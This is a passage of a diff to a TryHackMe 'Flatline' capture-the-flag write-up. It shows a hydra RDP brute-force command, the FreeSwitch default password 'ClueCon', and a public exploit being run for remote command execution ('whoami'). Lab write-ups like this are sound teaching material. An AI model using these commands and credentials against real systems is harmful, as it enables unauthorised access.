ajread4/thm_writeups_publish/Flatline.md

 Service detection performed.
 Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
 ```
-I started up hydra to brute force a log in with RDP.
+I started up hydra to brute force a log in with RDP to see what would happen.
 ```
 hydra -L /home/ajread/resources/wordlists/SecLists/Usernames/Names/names.txt -P /home/ajread/resources/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt [Remote IP]rdp
 ```
 # Enumeration
 However, it didnt work so I decided to go after the more interesting FreeSwitch service.
 I found a possible exploitiation with command execution (https://www.exploit-db.com/exploits/47799).
-I was able to connect to the service with the below command.
+According to the exploit, FreeSwitch allow commands to be run after proper authentication.
+The default password for the service is ```ClueCon```.
+So, I renamed the exploit to ```freeswitch.py``` and connected to the service with the below command.
 ```
 ajread@aj-ubuntu:~/TryHackMe/practice$ python3 freeswitch.py [Remote IP] whoami
 Authenticated